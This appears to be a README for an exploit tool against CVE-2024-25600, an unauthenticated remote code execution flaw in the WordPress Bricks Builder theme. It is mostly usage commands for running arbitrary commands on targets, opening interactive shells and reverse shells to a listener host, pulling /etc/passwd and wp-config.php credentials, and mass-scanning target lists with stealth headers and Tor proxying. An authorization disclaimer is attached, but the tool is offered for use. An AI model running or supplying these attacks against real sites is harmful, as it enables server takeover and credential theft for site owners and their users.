Share
## https://sploitus.com/exploit?id=4D839E55-13BB-57EF-8F41-540284E6BECC
# BricksRCE Exploiter

### CVE-2024-25600 โ€” WordPress Bricks Builder Unauthenticated RCE

[![Python](https://img.shields.io/badge/Python-3.8%2B-3776AB?logo=python&logoColor=white)](#installation)
[![Version](https://img.shields.io/badge/Version-1.0.0-orange)](#version-history)
[![CVSS](https://img.shields.io/badge/CVSS-9.8%20Critical-darkred)](#vulnerability-details)
[![CVE](https://img.shields.io/badge/CVE-2024--25600-red)](#vulnerability-details)
[![License](https://img.shields.io/badge/License-MIT-blue)](#license)
[![Platform](https://img.shields.io/badge/Platform-Linux%20%7C%20macOS%20%7C%20Windows-lightgrey)](#installation)

**Authorized security assessment tool for CVE-2024-25600**  
Author: **Sudeepa Wanigarathna** ยท Tool: **BricksRCE Exploiter v1.0**  
Main script: [`cve-2024-25600.py`](./cve-2024-25600.py)





---

> [!IMPORTANT]
> **Authorized use only.** This tool is for security research, education, and testing systems you own or have explicit written permission to assess. Unauthorized access to computer systems is illegal. The author assumes no liability for misuse.

---

## Table of Contents

- [Overview](#overview)
- [Vulnerability Details](#vulnerability-details)
- [Features](#features)
- [Installation](#installation)
- [Quick Start](#quick-start)
- [Usage Guide](#usage-guide)
- [Command Reference](#command-reference)
- [Interactive Shell](#interactive-shell)
- [Output & Logging](#output--logging)
- [Troubleshooting](#troubleshooting)
- [Repository Layout](#repository-layout)
- [Version History](#version-history)
- [Disclaimer](#disclaimer)
- [Author & Credits](#author--credits)
- [License](#license)

---

## Overview

**CVE-2024-25600** is a **critical, unauthenticated remote code execution** vulnerability in the WordPress **Bricks Builder** theme. Improper handling of user-controlled input in the `render_element` REST endpoint allows unauthenticated attackers to execute arbitrary PHP/system commands on affected installations.

**BricksRCE Exploiter** (`cve-2024-25600.py`) is a full-featured Python assessment tool for authorized security professionals to:

- Detect vulnerable Bricks Builder installations
- Validate impact with controlled command execution
- Interact with compromised hosts via an interactive shell
- Mass-scan target lists with async/threaded workers
- Export structured results for reporting

---

## Vulnerability Details

| Attribute | Value |
|---|---|
| **CVE ID** | [CVE-2024-25600](https://vulners.com/cve/CVE-2024-25600) |
| **CVSS** | 9.8 (Critical) |
| **Attack Vector** | Network โ€” unauthenticated |
| **Impact** | Full remote code execution, confidentiality / integrity / availability compromise |
| **Affected Product** | WordPress Bricks Builder theme |
| **Affected Versions** | Bricks โ‰ค **1.9.6** (patched in **1.9.6.1+**) |
| **Vulnerability Type** | Unauthenticated Remote Code Execution |
| **CWE** | CWE-94 (Improper Control of Generation of Code) |

### Affected Endpoints

| Endpoint | Method |
|---|---|
| `/wp-json/bricks/v1/render_element` | `POST` |
| `/?rest_route=/bricks/v1/render_element` | `POST` |

### Attack Summary

1. Extract a Bricks nonce from the target page source  
2. Submit a crafted `render_element` request with a malicious element payload  
3. Server-side code evaluation leads to arbitrary command execution  

### References

- [CVE-2024-25600 (MITRE)](https://vulners.com/cve/CVE-2024-25600)
- [NVD Entry](https://nvd.nist.gov/vuln/detail/CVE-2024-25600)
- [Bricks Builder Changelog / Security Advisory](https://bricksbuilder.io/)

---

## Features

### Core Capabilities

| Capability | Description |
|---|---|
| Vulnerability detection | Confirms RCE via controlled marker-based probe |
| Nonce extraction | Multi-method nonce discovery (scripts, page source, meta, REST) |
| Version detection | Identifies Bricks Builder version from CSS / readme / REST |
| Interactive shell | Full REPL with history, autocomplete, and file transfer |
| Single-command mode | Execute one command and exit (scripting-friendly) |
| Reverse shell helpers | Generate bash / nc / Python / PHP / Perl / Ruby reverse shells |
| wp-config extraction | Attempts to locate and read `wp-config.php` |
| Mass scanning | Async or threaded multi-target scanning from a URL list |

### Operational Controls

| Capability | Description |
|---|---|
| Rate limiting | Configurable delay between requests |
| Retry logic | Exponential backoff on timeouts and connection errors |
| User-Agent rotation | Random browser fingerprints per request |
| Stealth mode | Randomized Accept-Language / Accept-Encoding headers |
| Proxy support | HTTP, HTTPS, SOCKS5 / SOCKS5h |
| Dual endpoints | Prefer `wp-json`, `rest_route`, or both |
| Force mode | Skip pre-check and attempt exploitation directly |
| Rich CLI | Progress bars, tables, and colored panels via Rich |

### Reporting

| Capability | Description |
|---|---|
| JSON / TXT export | Save scan results and vulnerable targets |
| Command history | Optional logging of executed commands |
| File logging | Persistent `bricks_rce.log` plus custom log paths |

---

## Installation

### Prerequisites

- Python **3.8+**
- `pip`
- Network reachability to authorized target(s)

### Setup

```bash
git clone https://github.com/CerberusMrXi/WP-Bricks-Exploit-CVE-2024-25600.git
cd WP-Bricks-Exploit-CVE-2024-25600

python3 -m venv venv
source venv/bin/activate          # Windows: venv\Scripts\activate

pip install -r requirements.txt

python3 cve-2024-25600.py --help
```

### Dependencies

```text
requests>=2.31.0
aiohttp>=3.9.0
beautifulsoup4>=4.12.0
lxml>=4.9.0
prompt-toolkit>=3.0.0
rich>=13.7.0
pysocks>=1.7.0          # optional โ€” SOCKS5 proxy support
```

---

## Quick Start

> Replace `https://target.example` with a **lab or authorized** target only.

```bash
# Interactive shell
python3 cve-2024-25600.py -u https://target.example

# Single command
python3 cve-2024-25600.py -u https://target.example --cmd "id"

# Mass scan
python3 cve-2024-25600.py -f targets.txt -t 20 -o results.json

# Version detection
python3 cve-2024-25600.py -u https://target.example --detect-version

# Through Burp proxy
python3 cve-2024-25600.py -u https://target.example --proxy http://127.0.0.1:8080 -v
```

---

## Usage Guide

> All examples use the main script: **`cve-2024-25600.py`**

### 1. Show help

```bash
python3 cve-2024-25600.py --help
```

### 2. Single-target interactive shell

Opens an interactive RCE shell after confirming the target is vulnerable.

```bash
python3 cve-2024-25600.py -u https://target.example
```

Workflow:

1. Normalize and validate the URL  
2. Extract nonce from the page  
3. Verify vulnerability (unless `--force`)  
4. Drop into an interactive shell  

### 3. Execute a single command

```bash
python3 cve-2024-25600.py -u https://target.example --cmd "whoami"
```

Save command output to a file:

```bash
python3 cve-2024-25600.py -u https://target.example --cmd "id" --save-output
```

### 4. Choose payload type

```bash
# Default PHP exception-based payload
python3 cve-2024-25600.py -u https://target.example --cmd "uname -a" --payload php

# system() based payload
python3 cve-2024-25600.py -u https://target.example --cmd "uname -a" --payload system
```

### 5. Detect Bricks Builder version

```bash
python3 cve-2024-25600.py -u https://target.example --detect-version
```

Combine with a command:

```bash
python3 cve-2024-25600.py -u https://target.example --detect-version --cmd "id"
```

### 6. Extract wp-config.php

```bash
python3 cve-2024-25600.py -u https://target.example --extract-wp-config
```

Saved as `wp-config_.txt` on success.

### 7. Reverse shells (authorized lab only)

```bash
# Terminal 1 โ€” listener
nc -lvnp 4444

# Terminal 2 โ€” bash reverse shell
python3 cve-2024-25600.py -u https://target.example \
  --reverse-shell bash \
  --lhost 10.0.0.5 \
  --lport 4444
```

All supported reverse shell types:

```bash
python3 cve-2024-25600.py -u https://target.example --reverse-shell bash   --lhost 10.0.0.5 --lport 4444
python3 cve-2024-25600.py -u https://target.example --reverse-shell nc     --lhost 10.0.0.5 --lport 4444
python3 cve-2024-25600.py -u https://target.example --reverse-shell python --lhost 10.0.0.5 --lport 4444
python3 cve-2024-25600.py -u https://target.example --reverse-shell php    --lhost 10.0.0.5 --lport 4444
python3 cve-2024-25600.py -u https://target.example --reverse-shell perl   --lhost 10.0.0.5 --lport 4444
python3 cve-2024-25600.py -u https://target.example --reverse-shell ruby   --lhost 10.0.0.5 --lport 4444
```

### 8. Force mode (skip vulnerability check)

```bash
python3 cve-2024-25600.py -u https://target.example --force --cmd "uname -a"
```

### 9. Mass scanning from a file

```bash
# targets.txt โ€” one URL per line
python3 cve-2024-25600.py -f targets.txt
```

With threads, delay, stealth, and JSON output:

```bash
python3 cve-2024-25600.py -f targets.txt \
  -t 15 \
  --delay 0.5 \
  --stealth \
  -o vulnerable.json
```

Synchronous (thread-pool) scanning instead of async:

```bash
python3 cve-2024-25600.py -f targets.txt --sync -t 10 -o results.txt
```

Quiet mass scan:

```bash
python3 cve-2024-25600.py -f targets.txt -q -o results.json
```

### 10. Endpoint selection

```bash
# Both endpoints (default)
python3 cve-2024-25600.py -u https://target.example --endpoint both

# Only /wp-json/bricks/v1/render_element
python3 cve-2024-25600.py -u https://target.example --endpoint json

# Only /?rest_route=/bricks/v1/render_element
python3 cve-2024-25600.py -u https://target.example --endpoint rest_route
```

### 11. Stealth mode

```bash
python3 cve-2024-25600.py -u https://target.example \
  --stealth \
  --delay 1.0 \
  --max-retries 5 \
  --timeout 20
```

### 12. Custom User-Agent

```bash
# Custom UA
python3 cve-2024-25600.py -u https://target.example \
  --user-agent "Mozilla/5.0 (compatible; SecurityScanner/1.0)"

# Disable random UA rotation
python3 cve-2024-25600.py -u https://target.example --no-random-ua
```

### 13. Proxy support

```bash
# HTTP proxy (e.g. Burp Suite)
python3 cve-2024-25600.py -u https://target.example --proxy http://127.0.0.1:8080 -v

# SOCKS5 proxy
python3 cve-2024-25600.py -u https://target.example --proxy socks5://127.0.0.1:9050

# SOCKS5h (DNS through proxy / Tor)
python3 cve-2024-25600.py -u https://target.example --proxy socks5h://127.0.0.1:9050
```

### 14. SSL verification

```bash
# Enable SSL certificate verification (disabled by default)
python3 cve-2024-25600.py -u https://target.example --verify-ssl
```

### 15. Output and logging

```bash
# Save scan results as JSON
python3 cve-2024-25600.py -f targets.txt -o results.json

# Save scan results as TXT
python3 cve-2024-25600.py -f targets.txt -o results.txt

# Custom application log file
python3 cve-2024-25600.py -u https://target.example --log-file assessment.log -v

# Log executed commands
python3 cve-2024-25600.py -u https://target.example --command-log commands.log --cmd "id"
```

### 16. Verbose and quiet modes

```bash
# Verbose / debug logging
python3 cve-2024-25600.py -u https://target.example -v

# Quiet mode (minimal output)
python3 cve-2024-25600.py -u https://target.example -q --cmd "id"
```

### 17. Performance tuning

```bash
python3 cve-2024-25600.py -f targets.txt \
  -t 25 \
  --timeout 20 \
  --delay 0.2 \
  --max-retries 5 \
  -o results.json
```

### 18. Combined full assessment example

```bash
python3 cve-2024-25600.py -u https://target.example \
  --detect-version \
  --extract-wp-config \
  --stealth \
  --delay 0.8 \
  --timeout 20 \
  --max-retries 5 \
  --endpoint both \
  --proxy http://127.0.0.1:8080 \
  --log-file bricks_assessment.log \
  --command-log commands.log \
  -v
```

### 19. Interactive shell built-in commands

After starting with `-u` (no `--cmd` / `--reverse-shell`):

```text
Shell> whoami
Shell> id
Shell> pwd
Shell> ls -la
Shell> help
Shell> clear
Shell> download /etc/passwd
Shell> upload ./local.txt /tmp/remote.txt
Shell> php id
Shell> system uname -a
Shell> exit
```

---

## Command Reference

### Target Options

| Argument | Description |
|---|---|
| `-u`, `--url` | Single target URL |
| `-f`, `--file` | File containing target URLs (one per line) |

### Scanning Options

| Argument | Default | Description |
|---|---|---|
| `-t`, `--threads` | `10` | Concurrent workers for mass scans |
| `--delay` | `0.5` | Delay between requests (seconds) |
| `--timeout` | `15` | HTTP request timeout (seconds) |
| `--max-retries` | `3` | Retry attempts on failure |
| `--force` | off | Skip vulnerability check |
| `--sync` | off | Use thread pool instead of async |

### Stealth Options

| Argument | Description |
|---|---|
| `--user-agent` | Custom User-Agent string |
| `--no-random-ua` | Disable User-Agent rotation |
| `--proxy` | Proxy URL (`http://`, `https://`, `socks5://`, `socks5h://`) |
| `--stealth` | Enable stealth mode (random headers + delays) |
| `--endpoint` | `json` \| `rest_route` \| `both` (default: `both`) |

### Exploitation Options

| Argument | Description |
|---|---|
| `--cmd` | Execute a single command and exit |
| `--payload` | Payload type: `php` (default) or `system` |
| `--reverse-shell` | Shell type: `bash`, `nc`, `python`, `php`, `perl`, `ruby` |
| `--lhost` | Listener host for reverse shell |
| `--lport` | Listener port for reverse shell |
| `--extract-wp-config` | Attempt to extract `wp-config.php` |
| `--detect-version` | Detect Bricks Builder version |
| `--save-output` | Save single-command output to a file |

### Output Options

| Argument | Description |
|---|---|
| `-o`, `--output` | Results file (`.json` or `.txt`) |
| `--log-file` | Custom detailed log path |
| `--command-log` | Log executed commands to a file |
| `-v`, `--verbose` | Debug logging |
| `-q`, `--quiet` | Minimal console output |
| `--verify-ssl` | Enable SSL certificate verification (off by default) |

---

## Interactive Shell

When exploiting a single target without `--cmd` or `--reverse-shell`, an interactive shell opens:

```text
Shell> whoami
www-data

Shell> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Shell> help
```

### Built-in Commands

| Command | Description |
|---|---|
| `exit` | Exit the shell |
| `help` | Show help |
| `clear` | Clear the screen |
| `download [remote]` | Download a remote file (base64 transfer) |
| `upload [local] [remote]` | Upload a local file to the target |
| `php [cmd]` | Execute via PHP payload (default) |
| `system [cmd]` | Execute via `system()` payload |

### Features

- Command history persisted to `~/.bricks_rce_history`
- Autocomplete for common commands
- Auto-suggestions from history (prompt-toolkit)

---

## Output & Logging

### Console

Rich-powered panels, progress bars, and result tables:

```text
[*] Testing: https://target.example
[+] https://target.example is vulnerable!
[+] Interactive shell opened successfully
```

### Scan Results Table

| Metric | Description |
|---|---|
| Total Processed | URLs scanned |
| Successful | Confirmed vulnerable |
| Failed | Non-vulnerable / unreachable |
| Vulnerable Found | Count of confirmed RCE targets |
| Commands Executed | Total RCE command runs |
| Elapsed Time | Wall-clock scan duration |

### JSON Export (`-o results.json`)

```json
{
  "timestamp": "2026-07-17T01:30:00",
  "version": "1.0.0",
  "config": {
    "threads": 10,
    "timeout": 15,
    "delay": 0.5
  },
  "stats": {
    "processed": 100,
    "vulnerable": 3,
    "failed": 97
  },
  "vulnerable_targets": [
    {
      "url": "https://target.example",
      "timestamp": "2026-07-17T01:31:12"
    }
  ]
}
```

### Log Files

| File | Purpose |
|---|---|
| `bricks_rce.log` | Default append-only application log |
| `--log-file PATH` | Additional custom log handler |
| `--command-log PATH` | Executed command audit trail |

---

## Troubleshooting

| Symptom | What to try |
|---|---|
| Nonce not found | Confirm Bricks is active; try `-v`; ensure the front page loads |
| Target not vulnerable | Verify Bricks โ‰ค 1.9.6; try `--force`; check both endpoints |
| Connection timeouts | Raise `--timeout` / `--max-retries`; check proxy |
| Rate limited (429) | Increase `--delay`; enable `--stealth` |
| SSL errors | Default skips verify; use `--verify-ssl` only when needed |
| Async instability | Use `--sync` for threaded scanning |
| Reverse shell fails | Confirm listener is up; try alternate shell types (`python`, `nc`) |
| Empty command output | Command may have succeeded with no stdout; try `echo test` |
| wp-config not found | Paths vary by host; use interactive shell with custom `find` / `cat` |

### Debug Workflow

```bash
# Verbose single-target check
python3 cve-2024-25600.py -u https://target.example --detect-version -v

# Through Burp for request inspection
python3 cve-2024-25600.py -u https://target.example \
  --proxy http://127.0.0.1:8080 -v --cmd "id"

# Prefer a specific endpoint
python3 cve-2024-25600.py -u https://target.example --endpoint json -v
```

---

## Repository Layout

```text
exploit/
โ”œโ”€โ”€ cve-2024-25600.py     # BricksRCE Exploiter (v1.0)
โ”œโ”€โ”€ requirements.txt      # Python dependencies
โ”œโ”€โ”€ README.md             # This file
โ”œโ”€โ”€ bricks_rce.log        # Runtime log (generated)
โ””โ”€โ”€ venv/                 # Local virtualenv (optional, not committed)
```

---

## Version History

### v1.0.0 โ€” Initial Release

- Unauthenticated RCE detection and exploitation for CVE-2024-25600  
- Multi-method nonce extraction  
- Interactive shell with upload / download  
- Single-command and reverse-shell modes  
- Async / threaded mass scanning  
- Version detection and wp-config extraction  
- Stealth mode, UA rotation, proxy support  
- Rich CLI with JSON/TXT result export  

---

## Disclaimer

This project is provided **as-is** for **defensive security research** and **authorized penetration testing**.

By using this software you agree that:

1. You will only target systems you own or are explicitly authorized to test.  
2. You understand applicable computer-abuse and data-protection laws.  
3. The author and contributors are **not responsible** for damage, data loss, or legal consequences from misuse.  

If you discover this vulnerability in production environments you do not own, follow responsible disclosure practices and coordinate with the site owner / Bricks Builder security team.

**Unauthorized access to computer systems is a federal crime.**

---

## Author & Credits

| Role | Name |
|---|---|
| **Tool Author** | Sudeepa Wanigarathna |
| **CVE** | CVE-2024-25600 |
| **Tool** | BricksRCE Exploiter v1.0 |
| **Main Script** | `cve-2024-25600.py` |
| **License** | MIT |

---

## License

```
MIT License

Copyright (c) 2024โ€“2026 Sudeepa Wanigarathna

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
```

---

## Support

- Star the repo if it helps your authorized research  
- Open issues for bugs, false positives, or detection improvements  
- Pull requests welcome for docs and authorized-lab UX  

---



**For authorized security testing only.**